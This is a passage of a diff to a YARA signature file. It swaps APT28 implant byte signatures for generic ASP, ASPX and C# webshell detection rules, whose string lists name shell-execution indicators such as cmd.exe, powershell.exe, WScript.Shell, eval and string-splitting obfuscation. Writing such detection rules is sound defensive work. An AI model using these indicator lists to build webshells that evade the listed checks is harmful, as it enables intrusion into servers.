+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and not 1 of ( $fp* ) and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( filesize < 700 and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_1_V4 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Generic : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "0362b885-de59-5715-80f2-106e5e91d1fa"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L60-L73"
+		description = "Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
+		date = "2021-03-07"
+		modified = "2025-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4417-L4718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb8e4ed38e2e4d3991543c526c7dc458eec78c517d2c5eaa06a3a3cfb48d770f"
-		score = 85
-		quality = 85
+		hash = "a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75"
+		hash = "4cf6fbad0411b7d33e38075f5e00d4c8ae9ce2f6f53967729974d004a183b25c"
+		hash = "a91320483df0178eb3cafea830c1bd94585fc896"
+		hash = "f3398832f697e3db91c3da71a8e775ebf66c7e73"
+		logic_hash = "c1807922c71cb591ce63ea2d4531d85c5b45ad0f03db07381f8160aec18264ed"
+		score = 60
+		quality = -126
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ??
-         ?? ?? 32 04 0F 46 88 01 3B 75 0C 7C E0 }
+		$asp_much_sus7 = "Web Shell" nocase
+		$asp_much_sus8 = "WebShell" nocase
+		$asp_much_sus3 = "hidded shell"
+		$asp_much_sus4 = "WScript.Shell.1" nocase
+		$asp_much_sus5 = "AspExec"
+		$asp_much_sus14 = "\\pcAnywhere\\" nocase
+		$asp_much_sus15 = "antivirus" nocase
+		$asp_much_sus16 = "McAfee" nocase
+		$asp_much_sus17 = "nishang"
+		$asp_much_sus18 = "\"unsafe" fullword wide ascii
+		$asp_much_sus19 = "'unsafe" fullword wide ascii
+		$asp_much_sus28 = "exploit" fullword wide ascii
+		$asp_much_sus30 = "TVqQAAMAAA" wide ascii
+		$asp_much_sus31 = "HACKED" fullword wide ascii
+		$asp_much_sus32 = "hacked" fullword wide ascii
+		$asp_much_sus33 = "hacker" wide ascii
+		$asp_much_sus34 = "grayhat" nocase wide ascii
+		$asp_much_sus35 = "Microsoft FrontPage" wide ascii
+		$asp_much_sus36 = "Rootkit" wide ascii
+		$asp_much_sus37 = "rootkit" wide ascii
+		$asp_much_sus38 = "/*-/*-*/" wide ascii
+		$asp_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$asp_much_sus40 = "\"e\"+\"v" wide ascii
+		$asp_much_sus41 = "a\"+\"l\"" wide ascii
+		$asp_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$asp_much_sus43 = "q\"+\"u\"" wide ascii
+		$asp_much_sus44 = "\"u\"+\"e" wide ascii
+		$asp_much_sus45 = "/*//*/" wide ascii
+		$asp_much_sus46 = "(\"/*/\"" wide ascii
+		$asp_much_sus47 = "eval(eval(" wide ascii
+		$asp_much_sus48 = "Shell.Users" wide ascii
+		$asp_much_sus49 = "PasswordType=Regular" wide ascii
+		$asp_much_sus50 = "-Expire=0" wide ascii
+		$asp_much_sus51 = "sh\"&\"el" wide ascii
+		$asp_gen_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$asp_gen_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$asp_gen_sus6 = "self.delete"
+		$asp_gen_sus9 = "\"cmd /c" nocase
+		$asp_gen_sus10 = "\"cmd\"" nocase
+		$asp_gen_sus11 = "\"cmd.exe" nocase
+		$asp_gen_sus12 = "%comspec%" wide ascii
+		$asp_gen_sus13 = "%COMSPEC%" wide ascii
+		$asp_gen_sus18 = "Hklm.GetValueNames();" nocase
+		$asp_gen_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$asp_gen_sus21 = "\"upload\"" wide ascii
+		$asp_gen_sus22 = "\"Upload\"" wide ascii
+		$asp_gen_sus25 = "shell_" wide ascii
+		$asp_gen_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$asp_gen_sus30 = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$asp_gen_sus31 = "serv-u" wide ascii
+		$asp_gen_sus32 = "Serv-u" wide ascii
+		$asp_gen_sus33 = "Army" fullword wide ascii
+		$asp_slightly_sus1 = "<pre>" wide ascii
+		$asp_slightly_sus2 = "<PRE>" wide ascii
+		$asp_gen_obf1 = "\"+\"" wide ascii
+		$fp1 = "DataBinder.Eval"
+		$fp2 = "B2BTools"
+		$fp3 = "<b>Failed to execute cache update. See the log file for more information" ascii
+		$fp4 = "Microsoft. All rights reserved."
+		$fp5 = "\"unsafe\"," ascii wide
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$dex1 = "dex\n0"
+		$dex2 = "dey\n0"
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = "Start" fullword wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$tagasp_capa_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_capa_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_capa_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_capa_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_capa_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) and not any of ( $fp* ) and ( ( filesize < 3KB and ( 1 of ( $asp_slightly_sus* ) ) ) or ( filesize < 25KB and ( 1 of ( $asp_much_sus* ) or 1 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 2 ) ) ) or ( filesize < 50KB and ( 1 of ( $asp_much_sus* ) or 3 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 6 ) ) ) or ( filesize < 150KB and ( 1 of ( $asp_much_sus* ) or 4 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 6 ) or ( ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) and ( 1 of ( $asp_much_sus* ) or 2 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 3 ) ) ) ) ) or ( filesize < 100KB and ( any of ( $tagasp_capa_classid* ) ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_1_V5 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Registry_Reader : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "ac1c6175-3a8b-524b-bb18-243c52f7dba1"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L75-L91"
+		description = "Generic ASP webshell which reads the registry (might look for passwords, license keys, database settings, general recon, ..."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "02d6f95f-1801-5fb0-8ab8-92176cf2fdd7"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4720-L4867"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e9660dfe76bfe1eb17b434f2ddef4975495e952396212c41550d932dbb8e8205"
-		score = 85
-		quality = 85
+		hash = "4d53416398a89aef3a39f63338a7c1bf2d3fcda4"
+		hash = "f85cf490d7eb4484b415bea08b7e24742704bdda"
+		hash = "898ebfa1757dcbbecb2afcdab1560d72ae6940de"
+		logic_hash = "515bff52bebaad45481202ff934f8d1cbb79c27ccf47ca811077acacb7a47f13"
+		score = 50
+		quality = -53
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77
-         [5] 6A 69 [5] 6A 6E [5] 6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 }
-		$mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C
-         36 7A C7 45 ?? 73 71 33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 }
+		$asp_reg2 = "LocalMachine" fullword wide ascii
+		$asp_reg3 = "ClassesRoot" fullword wide ascii
+		$asp_reg4 = "CurrentUser" fullword wide ascii
+		$asp_reg5 = "Users" fullword wide ascii
+		$asp_reg6 = "CurrentConfig" fullword wide ascii
+		$asp_reg7 = "Microsoft.Win32" fullword wide ascii
+		$asp_reg8 = "OpenSubKey" fullword wide ascii
+		$sus1 = "shell" fullword nocase wide ascii
+		$sus2 = "cmd.exe" fullword wide ascii
+		$sus3 = "<form " wide ascii
+		$sus4 = "<table " wide ascii
+		$sus5 = "System.Security.SecurityException" wide ascii
+		$fp1 = "Avira Operations GmbH" wide
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and all of ( $asp_reg* ) and any of ( $sus* ) and not any of ( $fp* ) and ( filesize < 10KB or ( filesize < 150KB and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_1_V7 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Regeorg_CSHARP : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "2a28273f-d9a1-5e80-bef1-b488eb0326bd"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L112-L124"
+		description = "Webshell regeorg aspx c# version"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0a53d368-5f1b-55b7-b08f-36b0f8c5612f"
+		date = "2021-01-11"
+		modified = "2023-07-05"
+		reference = "https://github.com/sensepost/reGeorg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4869-L4979"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ff8443460e1818fd63e4dcf678bb592940b32978a70ab1633ebaa61c590d3916"
-		score = 85
-		quality = 85
+		hash = "c1f43b7cf46ba12cfc1357b17e4f5af408740af7ae70572c9cf988ac50260ce1"
+		hash = "479c1e1f1c263abe339de8be99806c733da4e8c1"
+		hash = "38a1f1fc4e30c0b4ad6e7f0e1df5a92a7d05020b"
+		hash = "e54f1a3eab740201feda235835fc0aa2e0c44ba9"
+		hash = "aea0999c6e5952ec04bf9ee717469250cddf8a6f"
+		logic_hash = "0c68f5955df2e75c3b5b4f1c6398fd57add1f64bfb3d46ccebf1c6767f5d2eb1"
+		score = 75
+		quality = -7
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF }
+		$input_sa1 = "Request.QueryString.Get" fullword nocase wide ascii
+		$input_sa2 = "Request.Headers.Get" fullword nocase wide ascii
+		$sa1 = "AddressFamily.InterNetwork" fullword nocase wide ascii
+		$sa2 = "Response.AddHeader" fullword nocase wide ascii
+		$sa3 = "Request.InputStream.Read" nocase wide ascii
+		$sa4 = "Response.BinaryWrite" nocase wide ascii
+		$sa5 = "Socket" nocase wide ascii
+		$georg = "Response.Write(\"Georg says, 'All seems fine'\")"
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		filesize < 300KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( $georg or ( all of ( $sa* ) and any of ( $input_sa* ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_CSHARP_Generic : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "058266d4-8dc5-5a26-9bc6-4c55ac646e9b"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L126-L138"
+		description = "Webshell in c#"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6d38a6b0-b1d2-51b0-9239-319f1fea7cae"
+		date = "2021-01-11"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4981-L5089"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6708239ea43fd36a7c9431cd2c6c185c0d406d65c4a31374c5e96bdc3e53de43"
-		score = 85
-		quality = 85
+		hash = "b6721683aadc4b4eba4f081f2bc6bc57adfc0e378f6d80e2bfa0b1e3e57c85c7"
+		hash = "4b365fc9ddc8b247a12f4648cd5c91ee65e33fae"
+		hash = "019eb61a6b5046502808fb5ab2925be65c0539b4"
+		hash = "620ee444517df8e28f95e4046cd7509ac86cd514"
+		hash = "a91320483df0178eb3cafea830c1bd94585fc896"
+		logic_hash = "fb367b79c8ed4a61618594db903cf3d70524685d7710d243163958ecb47634aa"
+		score = 75
+		quality = -5
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = { 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6a 00 6a 01}
+		$input_http = "Request." nocase wide ascii
+		$input_form1 = "<asp:" nocase wide ascii
+		$input_form2 = ".text" nocase wide ascii
+		$exec_proc1 = "new Process" nocase wide ascii
+		$exec_proc2 = "start(" nocase wide ascii
+		$exec_shell1 = "cmd.exe" nocase wide ascii
+		$exec_shell2 = "powershell.exe" nocase wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and filesize < 300KB and ( $input_http or all of ( $input_form* ) ) and all of ( $exec_proc* ) and any of ( $exec_shell* )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V3 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Runtime_Compile : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "747e4f76-b9c4-5988-90ae-b450548b1b82"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L140-L155"
+		description = "ASP webshell compiling payload in memory at runtime, e.g. sharpyshell"
